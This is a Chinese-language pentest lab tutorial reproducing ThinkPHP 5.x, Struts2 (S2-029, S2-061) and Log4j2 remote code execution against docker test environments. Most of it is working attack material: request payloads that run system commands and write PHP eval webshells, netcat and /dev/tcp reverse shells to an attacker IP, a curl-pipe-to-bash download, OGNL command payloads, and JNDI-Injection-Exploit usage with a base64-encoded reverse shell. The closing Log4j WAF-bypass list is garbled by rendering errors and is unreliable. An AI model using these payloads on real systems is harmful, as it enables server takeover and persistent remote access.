一、Thinkphp5.0.23 代码执行

1.thinkphp5框架

2.thinkphp5高危漏洞

根据ThinkPHP版本，如是5.x版本，即可使用ThinkPHP 5.x远程代码执行漏洞，无需登录，即可执行任意命令，获取服务器最高权限。

3.漏洞特征

4.THinkphp5.0 远程代码执行–poc

Windows：_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
POC参数解析
method=get 因为captcha的路由规则是get方式下的，所以我们得让method为get，才能获取到captcha的路由
s=captcha 因为在进入exec函数后我们要switch到method中执行param函数，而这个captcha的路由刚好对应类型为method，所以我们选择captcha
filter[]=system 覆盖变量
get[]=whoami 覆盖变量
_method=__construct 为了能够进入construct，从而覆盖变量

5.TP5实验一(Windows5.0.20)

a.搭建实验环境

_method=__construct&filter[]=system&method=get&get[]=whoami

b.测试phpinfo

利用system函数远程命令执行，通过phpinfo函数查看phpinfo()的信息；
写入phpinfo()；
/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo “<?php phpinfo(); ?>” > 1.php

c.写入shell

查看是否成功的写入shell
/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

d.使用菜刀连接

6.TP5实验二(Linux5.0.23)

a.搭建实验环境

cd ~5-rce
docker-compose up -d拉取靶场

b.测试方法

_method=__construct&filter[]=system&method=get&get[]=id

TP5的验证码在/vendor/topthink/think-captcha 目录下，文件分别是Captcha.php 、CaptchaController.php 和helper.php 三个文件。可以直接通过http://localhost/项目名称/public/index.php/captcha 来进行访问。

_method=__construct&filter[]=system&method=get&get[]=pwd

_method=__construct&filter[]=system&method=get&get[]=whoami

c.测试phpinfo

_method=__construct&filter[]=system&method=get&get[]=echo “<?php phpinfo(); ?>” > 1.php

Linux5.0.20测试方法
http://192.168.25.174:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`

d.写入shell

_method=__construct&filter[]=system&method=get&get[]=echo “<?php @eval($_POST["fname"]);?>” >shell.php

可以看出shell.php已经上传成功
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval(${}_{P}OST[cmd]);{?}^{>}>shell.php发现$_POST被删除了，引号也没了

如下改动后解决问题
_method=__construct&filter[]=system&method=get&get[]=echo “<?php @eval(\$_POST['fname']);?>” >shell.php

e.反弹shell

方法一

控制端输入
nc -lvvp 6666
被控端输入
nc -c /bin/bash 192.168.25.174 6666

控制端得到shell,此处执行ls命令

方法二

攻击机开启2个终端
分别输入nc -lvvp 2333和nc -lvvp 3333，一个输入一个输出
被攻击机输入
nc 192.168.25.174 2333 | /bin/bash | nc 192.168.25.174 3333
然后nc -lvvp 2333里执行命令ls,可以看到nc -lvvp 3333收到返回结果

方法三

首先本机创建文件shell.sh，放到本机WWW根目录

bash -i >& /dev/tcp/192.168.33.2/1111 0>&1

cmd下开启两个终端
nc.exe -lvvp 2333 -e cmd.exe用于监听输入

nc -lvp 1111用于获取输出
然后网页里输入
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl 192.168.33.2/shell.sh|bash

执行后即可在本机获取shell,此处是ls的查询结果

7.任务：靶场thinkphp漏洞复现

https://vulhub.org/#/environments/

tp5 poc参考大全
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

二、Struts2远程代码执行

1.漏洞介绍

Struts2漏洞是一个经典的漏洞系列，根源在于Struts2引入了OGNL表达式使得框架具有灵活的动态性。随着整体框架的补丁完善，现在想挖掘新的Struts2漏洞会比以前困难很多，从实际了解的情况来看，大部分用户早就修复了历史的高危漏洞。目前在做渗透测试时，Struts2漏洞主要也是碰碰运气，或者是打到内网之后用来攻击没打补丁的系统会比较有效。

2.Struts2执行代码的原理

Struts2的动态性在于ongl表达式可以获取到运行变量的值，并且有机会执行函数调用。如果可以把恶意的请求参数送到ognl的执行流程中，就会导致任意代码执行漏洞。
struts2的rce本质都是一样的(除了S2-052以外)，都是Struts2框架执行了恶意用户传进来的OGNL表达式，造成远程代码执行。可以造成“命令执行、服务器文件操作、打印回显、获取系统属性、危险代码执行”等，只不过需要精心构造不同的OGNL代码而已。

3.Struts2框架特征

查看被测应用系统的源码，URL接口地址以“.action”“.do”结尾或地址中包含“!”符号，或者在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件，若存在struts2-core-2..**.jar或xwork-core-2..**.jar格式的jar文件，则需检测是否存在Struts2远程代码执行漏洞。

4.S2-029漏洞复现(实验)

原理：Struts2的标签库使用OGNL表达式来访问ActionContext中的对象数据。为了能够访问到ActionContext中的变量，Struts2将ActionContext设置为OGNL的上下文，并将OGNL的跟对象加入ActionContext中。
在Struts2中，如下的标签就调用了OGNL进行取值。

parameters:

Struts2会解析value中的值，并当作OGNL表达式进行执行，获取到parameters对象的msg属性。S2-029仍然是依靠OGNL进行远程代码执行。 影响版本：Struts 2.0.0 -2.3.24.1（不包括2.3.20.3） 复现步骤： ### 1)拉取漏洞环境镜像到本地 命令：docker pull medicean/vulapps:s_struts2_s2-029 

2)启动漏洞环境

命令：docker run -d -p 8080:8080 medicean/vulapps:s_struts2_s2-029

3)访问http://192.168.25.174:8080/default.action

4)利用方法

方法一：工具利用

LiqunKit_1.5.jar
反弹shell

方法二：手工利用

poc：
(%23_memberAccess[‘allowPrivateAccess’]=true,%23_memberAccess[‘allowProtectedAccess’]=true,%23_memberAccess[‘excludedPackageNamePatterns’]=%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘excludedClasses’]=%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘allowPackageProtectedAccess’]=true,%23_memberAccess[‘allowStaticMethodAccess’]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream()))
注意：有些利用的时候要记得url编码

5)复现任务

S2-61

先切换到vulhub指定目录,记得清理占用

docker-compose up -d拉取镜像

使用dnslog进行请求，发现存在回显，说明存在漏洞
POC:%{(#instancemanager=#application[“org.apache.tomcat.InstanceManager”]).(#stack=#attr[“com.opensymphony.xwork2.util.ValueStack.ValueStack”]).(#bean=#instancemanager.newInstance(“org.apache.commons.collections.BeanMap”)).(#bean.setBean(#stack)).(#context=#bean.get(“context”)).(#bean.setBean(#context)).(#macc=#bean.get(“memberAccess”)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(“java.util.HashSet”)).(#bean.put(“excludedClasses”,#emptyset)).(#bean.put(“excludedPackageNames”,#emptyset)).(#arglist=#instancemanager.newInstance(“java.util.ArrayList”)).(#arglist.add(“ping dnslog的域名”)).(#execute=#instancemanager.newInstance(“freemarker.template.utility.Execute”)).(#execute.exec(#arglist))}

需先将GET改成POST,然后在下面添加
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 831

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name=“id”
和poc

POC:%{(#instancemanager=#application[“org.apache.tomcat.InstanceManager”]).(#stack=#attr[“com.opensymphony.xwork2.util.ValueStack.ValueStack”]).(#bean=#instancemanager.newInstance(“org.apache.commons.collections.BeanMap”)).(#bean.setBean(#stack)).(#context=#bean.get(“context”)).(#bean.setBean(#context)).(#macc=#bean.get(“memberAccess”)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(“java.util.HashSet”)).(#bean.put(“excludedClasses”,#emptyset)).(#bean.put(“excludedPackageNames”,#emptyset)).(#arglist=#instancemanager.newInstance(“java.util.ArrayList”)).(#arglist.add(“id”)).(#execute=#instancemanager.newInstance(“freemarker.template.utility.Execute”)).(#execute.exec(#arglist))}

S2-45

docker-compose up -d

下载路径/var/lib/docker/overlay2

S2-46

三、log4j2远程代码执行

1.漏洞介绍

log4j2是全球使用广泛的java日志框架，同时该漏洞还影响很多全球使用量的Top序列的通用开源组件。log4j2远程代码执行漏洞主要由于存在JNDI注入漏洞，黑客可以恶意构造特殊数据请求包，触发此漏洞，从而成功利用此漏洞可以在目标服务器上执行任意代码。注意，此漏洞是可以执行任意代码，这就很恐怖，相当于黑客已经攻入计算机，可以为所欲为了，就像已经进入你家，想干什么，就干什么，比如运行什么程序，植入什么病毒，变成他的肉鸡。

影响版本
Log4j2.x<=2.14.1

2.LDAP和JNDI

LDAP全称是Lightweight Directory Access Protocol( 轻型目录访问协议)，LDAP可以理解是一个简单存储数据的数据库
LDAP有一个客户端和服务器端，server端是用来存放资源，client端主要用于查询等操作。服务端都是有各大厂商的产品的比如Microsoft的AD，当然可以自己做。客户端通过LDAP协议去访问服务器端。
所以上述的payload ${jndi:ldap://xxx.xxx.xxx.xxx:1389/Exp}就相当于ldap通过jndi来提供服务。xxx.xxx.xxx.xxx这个是LDAP服务器端的IP地址，LDAP服务器是默认开启1389端口的，Exp是一个不存在的文件名
JNDI ：JAVA NAMING AND Directory interface，Java命名和目录接口)，则是Java中用于访问LDAP的API，是为了Java程序访问命名服务和目录服务而提供的统一API。

3.漏洞原理

我们在很多漏洞复现文章看到构造的payload是这样的$jndi:ldap://xxx.xxx.xxx.xxx:1389/Exp,该漏洞是由于ApacheLog4j2某些功能存在递归解析功能，未经身份验证的攻击者通过发送特定恶意数据包，可在目标服务器上执行任意代码。Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，未经授权的攻击者利用该漏洞，可向目标服务器发送精心构造的恶意数据，触发Log4j2组件解析缺陷，实现目标服务器的任意代码执行，获得目标服务器权限。Log4j2漏洞总的来说就是：因为Log4j2默认支持解析ldap/rmi协议（只要打印的日志中包括ldap/rmi协议即可），并会通过名称从ldap服务端其获取对应的Class文件，并使用ClassLoader在本地加载Ldap服务端返回的Class类。ApacheLog4j远程代码执行漏洞，正是由于组件存在JavaJNDI注入漏洞：当程序将用户输入的数据记入日志时，攻击者通过构造特殊请求，来触发ApacheLog4j2中的远程代码执行漏洞，从而利用此漏洞在目标服务器上执行任意代码。利用jndi访问ldap服务后，ldap服务返回了class攻击代码，被攻击的服务器执行了攻击代码。远程代码执行漏洞，是利用了Log4j2可以对日志中的“${}”进行解析执行，来进行攻击的。

4.*log4j2-漏洞复现(实验)

1)拉取docker环境

docker pull vulfocus/log4j2-rce-2021-12-09

2)启动环境-查看镜像

docker images

3)启动并端口映射

docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09

4)测试步骤

1）正常来测试，发现这里主要对{}产生过滤。

2）将payload进行url编码。

生成你自己的DNSlog并将生成的地址替换进payload=${jndi:ldap://DNSLog/exp},然后发生数据给靶机。

/hello?payload=${jndi:ldap://p5pok7.dnslog.cn/exp}显示400，即错误的请求。

回到DNSLog页面刷新Refresh Record 便能查询道靶机递归查询日志的记录。
Log4J2漏洞的危害便是能够远程执行代码，并且采用此框架件的厂商众多，造成的危害面广

5.4.log4j2-漏洞验证(实验)

1)拉取docker环境

docker pull vulfocus/log4j2-rce-2021-12-09

2)启动环境-查看镜像

docker images

3)启动并端口映射

docker run -tid -p 8080:8080 vulfocus/log4j2-rce-2021-12-09

点击链接后

4)测试步骤

1）正常来测试，发现这里主要对{}产生过滤。
2）将payload进行url编码。
生成你自己的DNSlog并将生成的地址替换进payload=${jndi:ldap://DNSLog/exp},然后发生数据给靶机。

需进行URL编码

http://192.168.25.174:8080/hello?payload=%24%7Bjndi%3Aldap%3A%2F%2F42kopn.dnslog.cn%2Fexp%7D
执行后dnslog收到数据

Log4J2漏洞的危害便是能够远程执行代码，并且采用此框架件的厂商众多，造成的危害面广

5.log4j2-漏洞利用(实验)

利用JNDI注入工具在攻击机上开启JNDI服务器
攻击机IP：192.168.33.2
被攻击机IP：192.168.25.174

1)准备JNDI注入工具

git clone https://gitee.com/Lemon_i/JNDI-Injection-Exploit.git

2)准备shell代码

利用JNDI注入反弹shell，并将命令进行base64编码，不然可能会报错
bash -i >& /dev/tcp/攻击主机IP/端口 0>&1

3)攻击机启动监听用于获取shell

nc -lvp 1111

4)启动JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,base64编码后的shell}|{base64,-d}|{bash,-i}” -A 攻击主机IP
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjIvMTExMSAwPiYx}|{base64,-d}|{bash,-i}” -A 192.168.33.2
注释：-C是执行的bash命令，后面是执行的具体命令，用双引号引起来-A 指服务器的IP
因为JDK版本的问题，我们选择的链接是rmi://192.168.33.2:1099/uimfib
注意：这个链接每次运行JNDI-Injection-Exploit 时都会变化

5)传递payload

打开浏览器，用get传递payload，payload=${jndi:rmi://192.168.33.2:1099/uimfib}
进行URL编码为payload=%24%7Bjndi%3Armi%3A%2F%2F192.168.33.2%3A1099%2Fuimfib%7D

6)JNDI接收请求

7)反弹shell

可以看出已经成功反弹shell

8)关于Exception in thread “Thread-1” java.lang.IllegalAccessError报错原因

原因是jdk版本太高

重装JDK1.8后得以解决问题

6.log4j漏洞防护

1.升级最新版本的log4j组件

2.临时处理，过滤${}，避免被执行命令

7.poc

${jndi:ldap://xxx.dnslog.cn/poc}
waf绕过
KaTeX parse error: Expected '}', got 'EOF' at end of input: {{::-j}$::-n${::-d}$::-i:${::-r}$::-m${::-i}😕/xxx.dnslog.cn/poc}
KaTeX parse error: Expected '}', got 'EOF' at end of input: {{::-j}ndi:rmi://xxx.dnslog.cn/poc}
${jndi:rmi://xxx.dnslog.cn/poc}
KaTeX parse error: Expected '}', got 'EOF' at end of input: {{lower:jndi}😒{lower:rmi}😕/xxx.dnslog.cn/poc}
KaTeX parse error: Expected '}', got 'EOF' at end of input: {{lower:KaTeX parse error: Expected 'EOF', got '}' at position 13: {lower:jndi}}̲:{lower:rmi}😕/xxx.dnslog.cn/poc}
KaTeX parse error: Expected '}', got 'EOF' at end of input: {{lower:j}$lower:n${lower:d}i:${lower:rmi}😕/xxx.dnslog.cn/poc}